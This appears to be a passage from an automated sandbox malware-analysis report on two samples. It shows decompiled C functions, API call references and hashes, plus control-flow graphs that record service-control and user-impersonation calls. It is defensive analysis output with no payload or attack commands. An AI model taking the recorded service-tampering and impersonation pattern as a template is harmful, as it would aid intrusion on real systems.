                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24fa9c10ed26554529d24a5d159c5fe6817c35b8c8c6b96af80b0b6bde0a6673
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A901A772D0121877DB304BB65C48EEF7B7DEBC6B20F14022BFA15E2284D561C640EA76
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                    			E00FD6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                    				struct HRSRC__* _t6;
                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                    				struct HINSTANCE__* _t23;
                                                                                                                                                                                                    				int _t24;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t23 =  *0xfd9a3c; // 0xfd0000
                                                                                                                                                                                                    				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                    				if(_t6 == 0) {
                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                    					E00FD44B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					_t24 = _a16;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                    					if(_t21 == 0) {
                                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						if(_a12 != 0) {
                                                                                                                                                                                                    							_push(_a12);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                    						FreeResource(_t21);
                                                                                                                                                                                                    						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t24;
                                                                                                                                                                                                    			}







                                                                                                                                                                                                    0x00fd651f
                                                                                                                                                                                                    0x00fd652a
                                                                                                                                                                                                    0x00fd6534
                                                                                                                                                                                                    0x00fd656b
                                                                                                                                                                                                    0x00fd6577
                                                                                                                                                                                                    0x00fd657c
                                                                                                                                                                                                    0x00fd6536
                                                                                                                                                                                                    0x00fd653e
                                                                                                                                                                                                    0x00fd6542
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd6544
                                                                                                                                                                                                    0x00fd6547
                                                                                                                                                                                                    0x00fd654c
                                                                                                                                                                                                    0x00fd6549
                                                                                                                                                                                                    0x00fd6549
                                                                                                                                                                                                    0x00fd6549
                                                                                                                                                                                                    0x00fd655e
                                                                                                                                                                                                    0x00fd6560
                                                                                                                                                                                                    0x00fd6569
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd6569
                                                                                                                                                                                                    0x00fd6542
                                                                                                                                                                                                    0x00fd6587

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00FD0000,000007D6,00000005), ref: 00FD652A
                                                                                                                                                                                                    • LoadResource.KERNEL32(00FD0000,00000000,?,?,00FD2EE8,00000000,00FD19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00FD6538
                                                                                                                                                                                                    • DialogBoxIndirectParamA.USER32(00FD0000,00000000,00000547,00FD19E0,00000000), ref: 00FD6557
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00FD2EE8,00000000,00FD19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00FD6560
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1214682469-0
                                                                                                                                                                                                    • Opcode ID: 0283023f198efd3b4d2c3edaecd8731be74b6d28625a184af378933947b7287a
                                                                                                                                                                                                    • Instruction ID: 026f1fa1a46b25acad46fd3db8a390eedcedec756764ce2080e0011796524de1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0283023f198efd3b4d2c3edaecd8731be74b6d28625a184af378933947b7287a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F012672501209BBCB106FB9AC08EBB7B6EEB85370F08012BFE00D3250D7719D50AAA5
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                    			E00FD65E8(char* __ecx) {
                                                                                                                                                                                                    				char _t3;
                                                                                                                                                                                                    				char _t10;
                                                                                                                                                                                                    				char* _t12;
                                                                                                                                                                                                    				char* _t14;
                                                                                                                                                                                                    				char* _t15;
                                                                                                                                                                                                    				CHAR* _t16;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t12 = __ecx;
                                                                                                                                                                                                    				_t15 = __ecx;
                                                                                                                                                                                                    				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                    				_t10 = 0;
                                                                                                                                                                                                    				do {
                                                                                                                                                                                                    					_t3 =  *_t12;
                                                                                                                                                                                                    					_t12 =  &(_t12[1]);
                                                                                                                                                                                                    				} while (_t3 != 0);
                                                                                                                                                                                                    				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                    					if(_t16 <= _t15) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if( *_t16 == 0x5c) {
                                                                                                                                                                                                    						L7:
                                                                                                                                                                                                    						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                    							_t16 = CharNextA(_t16);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *_t16 = _t10;
                                                                                                                                                                                                    						_t10 = 1;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_push(_t16);
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                    					return _t10;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if( *_t16 == 0x5c) {
                                                                                                                                                                                                    					goto L7;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				goto L11;
                                                                                                                                                                                                    			}









                                                                                                                                                                                                    0x00fd65e8
                                                                                                                                                                                                    0x00fd65ed
                                                                                                                                                                                                    0x00fd65ef
                                                                                                                                                                                                    0x00fd65f2
                                                                                                                                                                                                    0x00fd65f4
                                                                                                                                                                                                    0x00fd65f4
                                                                                                                                                                                                    0x00fd65f6
                                                                                                                                                                                                    0x00fd65f7
                                                                                                                                                                                                    0x00fd6608
                                                                                                                                                                                                    0x00fd6611
                                                                                                                                                                                                    0x00fd6618
                                                                                                                                                                                                    0x00fd661c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd660e
                                                                                                                                                                                                    0x00fd6623
                                                                                                                                                                                                    0x00fd6625
                                                                                                                                                                                                    0x00fd663b
                                                                                                                                                                                                    0x00fd663b
                                                                                                                                                                                                    0x00fd663d
                                                                                                                                                                                                    0x00fd6641
                                                                                                                                                                                                    0x00fd6610
                                                                                                                                                                                                    0x00fd6610
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd6610
                                                                                                                                                                                                    0x00fd6644
                                                                                                                                                                                                    0x00fd6647
                                                                                                                                                                                                    0x00fd6647
                                                                                                                                                                                                    0x00fd6621
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00FD2B33), ref: 00FD6602
                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000), ref: 00FD6612
                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000), ref: 00FD6629
                                                                                                                                                                                                    • CharNextA.USER32(00000000), ref: 00FD6635
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Char$Prev$Next
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3260447230-0
                                                                                                                                                                                                    • Opcode ID: 9e6d0f5c4c8a9e2980e477c8e4ddc65a15795e6a3e3403dfa3a7d02dcd0d9b5b
                                                                                                                                                                                                    • Instruction ID: c8bbec9350f52d2f0c14f7743634a895edf1c7cb58bc6a80e1540ff8fba8f69c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e6d0f5c4c8a9e2980e477c8e4ddc65a15795e6a3e3403dfa3a7d02dcd0d9b5b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11F028328051506EE7321F389C889BBBF9FCF8B374B2D01AFE491C6201D6164E46AA61
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00FD69B0() {
                                                                                                                                                                                                    				intOrPtr* _t4;
                                                                                                                                                                                                    				intOrPtr* _t5;
                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                    				intOrPtr _t11;
                                                                                                                                                                                                    				intOrPtr _t12;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				 *0xfd81f8 = E00FD6C70();
                                                                                                                                                                                                    				__set_app_type(E00FD6FBE(2));
                                                                                                                                                                                                    				 *0xfd88a4 =  *0xfd88a4 | 0xffffffff;
                                                                                                                                                                                                    				 *0xfd88a8 =  *0xfd88a8 | 0xffffffff;
                                                                                                                                                                                                    				_t4 = __p__fmode();
                                                                                                                                                                                                    				_t11 =  *0xfd8528; // 0x0
                                                                                                                                                                                                    				 *_t4 = _t11;
                                                                                                                                                                                                    				_t5 = __p__commode();
                                                                                                                                                                                                    				_t12 =  *0xfd851c; // 0x0
                                                                                                                                                                                                    				 *_t5 = _t12;
                                                                                                                                                                                                    				_t6 = E00FD7000();
                                                                                                                                                                                                    				if( *0xfd8000 == 0) {
                                                                                                                                                                                                    					__setusermatherr(E00FD7000);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				E00FD71EF(_t6);
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}








                                                                                                                                                                                                    0x00fd69b7
                                                                                                                                                                                                    0x00fd69c2
                                                                                                                                                                                                    0x00fd69c8
                                                                                                                                                                                                    0x00fd69cf
                                                                                                                                                                                                    0x00fd69d8
                                                                                                                                                                                                    0x00fd69de
                                                                                                                                                                                                    0x00fd69e4
                                                                                                                                                                                                    0x00fd69e6
                                                                                                                                                                                                    0x00fd69ec
                                                                                                                                                                                                    0x00fd69f2
                                                                                                                                                                                                    0x00fd69f4
                                                                                                                                                                                                    0x00fd6a00
                                                                                                                                                                                                    0x00fd6a07
                                                                                                                                                                                                    0x00fd6a0d
                                                                                                                                                                                                    0x00fd6a0e
                                                                                                                                                                                                    0x00fd6a15

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00FD6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00FD6FC5
                                                                                                                                                                                                    • __set_app_type.MSVCRT ref: 00FD69C2
                                                                                                                                                                                                    • __p__fmode.MSVCRT ref: 00FD69D8
                                                                                                                                                                                                    • __p__commode.MSVCRT ref: 00FD69E6
                                                                                                                                                                                                    • __setusermatherr.MSVCRT ref: 00FD6A07
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1632413811-0
                                                                                                                                                                                                    • Opcode ID: 3ce41d944a9dbab72fd0688eac6c5d4c6e7a903edcd3a9290e64983bcd4c43b3
                                                                                                                                                                                                    • Instruction ID: 31fb2eb9ef72096efda9031ada13106cef59353e5edbb3def78d789b7f3d8254
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ce41d944a9dbab72fd0688eac6c5d4c6e7a903edcd3a9290e64983bcd4c43b3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19F0F87050A3098FC714AB35AD0E6083B63FB04372B18460BE4A1863E4DF3E9546BA15
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 17 7ffbace61b10-7ffbace61b17 18 7ffbace61b22-7ffbace61bd8 17->18 19 7ffbace61b19-7ffbace61b21 17->19 24 7ffbace61bda-7ffbace61be9 18->24 25 7ffbace61c36-7ffbace61c68 18->25 19->18 24->25 26 7ffbace61beb-7ffbace61bee 24->26 30 7ffbace61cc7-7ffbace61d00 25->30 31 7ffbace61c6a-7ffbace61c7a 25->31 28 7ffbace61bf0-7ffbace61c03 26->28 29 7ffbace61c28-7ffbace61c30 26->29 32 7ffbace61c07-7ffbace61c1a 28->32 33 7ffbace61c05 28->33 29->25 41 7ffbace61d02-7ffbace61d11 30->41 42 7ffbace61d5e-7ffbace61d97 30->42 31->30 34 7ffbace61c7c-7ffbace61c7f 31->34 32->32 35 7ffbace61c1c-7ffbace61c24 32->35 33->32 36 7ffbace61c81-7ffbace61c94 34->36 37 7ffbace61cb9-7ffbace61cc1 34->37 35->29 39 7ffbace61c98-7ffbace61cab 36->39 40 7ffbace61c96 36->40 37->30 39->39 43 7ffbace61cad-7ffbace61cb5 39->43 40->39 41->42 44 7ffbace61d13-7ffbace61d16 41->44 50 7ffbace61d99-7ffbace61da9 42->50 51 7ffbace61df6-7ffbace61e2f 42->51 43->37 46 7ffbace61d50-7ffbace61d58 44->46 47 7ffbace61d18-7ffbace61d2b 44->47 46->42 48 7ffbace61d2f-7ffbace61d42 47->48 49 7ffbace61d2d 47->49 48->48 52 7ffbace61d44-7ffbace61d4c 48->52 49->48 50->51 53 7ffbace61dab-7ffbace61dae 50->53 57 7ffbace61e31-7ffbace61e41 51->57 58 7ffbace61e8e-7ffbace61ec7 51->58 52->46 55 7ffbace61db0-7ffbace61dc3 53->55 56 7ffbace61de8-7ffbace61df0 53->56 59 7ffbace61dc7-7ffbace61dda 55->59 60 7ffbace61dc5 55->60 56->51 57->58 61 7ffbace61e43-7ffbace61e46 57->61 68 7ffbace61ec9-7ffbace61ed9 58->68 69 7ffbace61f26-7ffbace61fe2 ChangeServiceConfigA 58->69 59->59 62 7ffbace61ddc-7ffbace61de4 59->62 60->59 63 7ffbace61e80-7ffbace61e88 61->63 64 7ffbace61e48-7ffbace61e5b 61->64 62->56 63->58 66 7ffbace61e5f-7ffbace61e72 64->66 67 7ffbace61e5d 64->67 66->66 70 7ffbace61e74-7ffbace61e7c 66->70 67->66 68->69 71 7ffbace61edb-7ffbace61ede 68->71 75 7ffbace61fea-7ffbace61ffc call 7ffbace62049 69->75 76 7ffbace61fe4 69->76 70->63 73 7ffbace61ee0-7ffbace61ef3 71->73 74 7ffbace61f18-7ffbace61f20 71->74 77 7ffbace61ef7-7ffbace61f0a 73->77 78 7ffbace61ef5 73->78 74->69 81 7ffbace62001-7ffbace6202d 75->81 76->75 77->77 79 7ffbace61f0c-7ffbace61f14 77->79 78->77 79->74 83 7ffbace6202f 81->83 84 7ffbace62034-7ffbace62048 81->84 83->84
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.284199442.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffbace60000_buze36rj14.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ChangeConfigService
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3849694230-0
                                                                                                                                                                                                    • Opcode ID: 25f4d0fa5f7fdbbb15b383a3375312782906dc8e6c69f4aa854276c1247b6e4d
                                                                                                                                                                                                    • Instruction ID: bb132d314eb43a929759f288089e1c7f2914ee1cf4447928ce6a288266700d83
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 25f4d0fa5f7fdbbb15b383a3375312782906dc8e6c69f4aa854276c1247b6e4d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BFF1A370928A4E4FEB69DE28D84A7F977D0FB54311F10426AEC4EC7291DA74E5818B82
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.284199442.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffbace60000_buze36rj14.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: NameUser
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2645101109-0
                                                                                                                                                                                                    • Opcode ID: 6008e5e268863e4dfbc076c2aa508a7742d35526728dee1705c4e287925bb39d
                                                                                                                                                                                                    • Instruction ID: c7d2f1d950349f3271987a635adcd01b6060ae6a4d5854c917d3edb1f205dee4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6008e5e268863e4dfbc076c2aa508a7742d35526728dee1705c4e287925bb39d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7916E70618A4D8FEBA9EF28C8597E977D1FF54310F00416AE84EC7291DB78A985CB81
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 121 7ffbace60c34-7ffbace60c3b 122 7ffbace60c3d-7ffbace60c45 121->122 123 7ffbace60c46-7ffbace60ce5 121->123 122->123 128 7ffbace60d40-7ffbace60daa OpenServiceA 123->128 129 7ffbace60ce7-7ffbace60cf6 123->129 136 7ffbace60db2-7ffbace60de6 call 7ffbace60e02 128->136 137 7ffbace60dac 128->137 129->128 130 7ffbace60cf8-7ffbace60cfb 129->130 131 7ffbace60cfd-7ffbace60d10 130->131 132 7ffbace60d35-7ffbace60d3d 130->132 134 7ffbace60d12 131->134 135 7ffbace60d14-7ffbace60d27 131->135 132->128 134->135 135->135 138 7ffbace60d29-7ffbace60d31 135->138 142 7ffbace60ded-7ffbace60e01 136->142 143 7ffbace60de8 136->143 137->136 138->132 143->142
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.284199442.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffbace60000_buze36rj14.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: OpenService
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3098006287-0
                                                                                                                                                                                                    • Opcode ID: 3a75a217f23de1911e737ae4bff967350deb5e9cce94b35f724efb74e4d65644
                                                                                                                                                                                                    • Instruction ID: 73640eeb3c68f4adabe7de7aaa99320d8c18b22f40cd16b6342a733f850b4fff
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a75a217f23de1911e737ae4bff967350deb5e9cce94b35f724efb74e4d65644
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C518470518A4D8FDB59EF28D84A7F977D1FB59315F10422AE84EC3292DE74E842CB82
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 144 7ffbace60b2d-7ffbace60bb8 149 7ffbace60bc2-7ffbace60bc7 144->149 150 7ffbace60bba-7ffbace60bbf 144->150 151 7ffbace60bd1-7ffbace60c08 OpenSCManagerW 149->151 152 7ffbace60bc9-7ffbace60bce 149->152 150->149 153 7ffbace60c10-7ffbace60c2d 151->153 154 7ffbace60c0a 151->154 152->151 154->153
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.284199442.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffbace60000_buze36rj14.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ManagerOpen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1889721586-0
                                                                                                                                                                                                    • Opcode ID: 450e9515a5d2da9de7335b60311a062e27d389d31a84452c9e5c6366e58add7e
                                                                                                                                                                                                    • Instruction ID: 65d968a29d83eaca4270e95413268564572da6005fc1862e792aabb819076b41
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 450e9515a5d2da9de7335b60311a062e27d389d31a84452c9e5c6366e58add7e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB31C07181CB588FDB29DF98D8496F9BBE0EB65321F04816FD04ED3252CE74A845CB81
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 155 7ffbace61a1d-7ffbace61a25 156 7ffbace61a28-7ffbace61ad9 ControlService 155->156 157 7ffbace61a27 155->157 161 7ffbace61ae1-7ffbace61b09 156->161 162 7ffbace61adb 156->162 157->156 162->161
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.284199442.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffbace60000_buze36rj14.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ControlService
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 253159669-0
                                                                                                                                                                                                    • Opcode ID: 7eb08fe1f4f7d99076ddfac11926eeb214428b51e5ba676480471c614334723c
                                                                                                                                                                                                    • Instruction ID: 36d4f5365ee7f00bce120c0241f158b80b2907b5a5c7166c43ba07860cc1a085
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7eb08fe1f4f7d99076ddfac11926eeb214428b51e5ba676480471c614334723c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E331C47191CB588FDB28DF9CD845AF97BE0EF65321F04016EE08AD3252CB74A806CB91
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 163 7ffbace6108a-7ffbace610b3 164 7ffbace610be-7ffbace61152 FindCloseChangeNotification 163->164 165 7ffbace610b5-7ffbace610bd 163->165 169 7ffbace6115a-7ffbace61181 164->169 170 7ffbace61154 164->170 165->164 170->169
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.284199442.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffbace60000_buze36rj14.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2591292051-0
                                                                                                                                                                                                    • Opcode ID: 429bdfd87d7410929523c7fb335b930db48fc84aacc01f0fd3efbbac2ca02b12
                                                                                                                                                                                                    • Instruction ID: f295a20e9874a9c3705481584360766b8b85277df0112a48fa14cfc89908b391
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 429bdfd87d7410929523c7fb335b930db48fc84aacc01f0fd3efbbac2ca02b12
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4231087090CB8C4FDB4ADB68C8157E97FF0EF56321F04429FD089D31A2DA696856CB91
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 171 7ffbace61760-7ffbace61767 172 7ffbace61772-7ffbace61802 ImpersonateLoggedOnUser 171->172 173 7ffbace61769-7ffbace61771 171->173 177 7ffbace6180a-7ffbace61831 172->177 178 7ffbace61804 172->178 173->172 178->177
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.284199442.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffbace60000_buze36rj14.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ImpersonateLoggedUser
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2216092060-0
                                                                                                                                                                                                    • Opcode ID: 1a15b5bc89a9a98537dfeb3268ab531a9449fd29fd33178c3f4de7af4dc5c6e5
                                                                                                                                                                                                    • Instruction ID: d15c777f5ee14e650b5bf6624de5f4d9dd4f5bd6614d3b00a50e26f6674e4bc9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a15b5bc89a9a98537dfeb3268ab531a9449fd29fd33178c3f4de7af4dc5c6e5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5131D47190CA4C8FEB59DB68D845BF9BBE0EB66321F00422ED049D3192DB74A856CB91
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
